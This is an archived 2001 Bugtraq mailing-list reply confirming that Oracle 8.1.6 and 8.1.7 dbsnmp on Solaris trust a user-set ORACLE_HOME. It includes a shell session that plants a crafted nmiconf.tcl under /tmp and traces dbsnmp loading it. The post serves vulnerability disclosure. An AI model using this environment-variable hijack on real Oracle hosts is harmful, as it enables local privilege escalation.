[22075] in bugtraq
Re: Oracle 8.1.5 dbsnmp vulnerability
daemon@ATHENA.MIT.EDU (SChoe)
Thu Aug 2 01:25:04 2001
Date: Wed, 1 Aug 2001 13:06:07 -1000 (HST)
From: SChoe <schoe@CheapTickets.COM>
To: <bugtraq@securityfocus.com>
Cc: <ssakata@CheapTickets.COM>, <bhunter@CheapTickets.COM>,
<tdunlap@CheapTickets.COM>, <dwagner@CheapTickets.COM>,
<mmacke@CheapTickets.COM>, <rrubio@CheapTickets.COM>,
<gomeze@CheapTickets.COM>
Message-ID: <Pine.GSO.4.31.0108011232330.25456-100000@payt01.corp.cheaptickets.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
> Ismael Briones wrote:
> Oracle-8.1.6 is not vulnerable
This was an issue that existed with 8.0.5 and maybe even
before that. I had drafted a report on this on 6/22/2000
for in house reference. I have found that the following:
TESTED ON SPARC/solaris 2.7
===========================
> oracle-8.1.6 -> affected
> oracle-8.1.7 -> affected
are also susceptible to false $ORACLE_HOME values.
<-------------------------- snip -------------------------->
schoe@host $ echo $ORACLE_HOME
/usr/app/oracle/product/8.1.6
schoe@host $ unsetenv $ORACLE_HOME; /usr/oracle/product/8.1.6/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462
schoe@host $ unsetenv ORACLE_HOME
schoe@host $ mkdir -p /tmp/network/agent/config
schoe@host $ setenv ORACLE_HOME "/tmp"
schoe@host $ echo "return \$ORACLE_HOME" > /tmp/network/agent/config/nmiconf.tcl
schoe@host $ chmod +x /tmp/network/agent/config/nmiconf.tcl
schoe@host $ truss -fae /usr/oracle/product/8.1.6/bin/dbsnmp
...
3773: lstat64("/home", 0xFFBEE0F0) = 0
3773: lstat64("/home/..", 0xFFBEE0F0) = 0
3773: llseek(8, 0xFFFFFFFFFFFFFCFF, SEEK_CUR) = 276
3773: close(8) = 0
3773: close(7) = 0
3773: chdir("/tmp/network/agent/config") = 0
...
4509: close(7) = 0
4509: stat("/tmp/network/agent/config/nmiconf.tcl", 0xFFBEE93C) = 0
4509: open("/tmp/network/agent/config/nmiconf.tcl", O_RDONLY) = 7
4509: read(7, " r e t u r n $ O R A C".., 4096) = 20
4509: close(7) = 0
...
<-------------------------- snap -------------------------->
+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
| |
| Ph: 808/945.7439 Fax: 808/946.5993 |
:--------------------------------------------------+
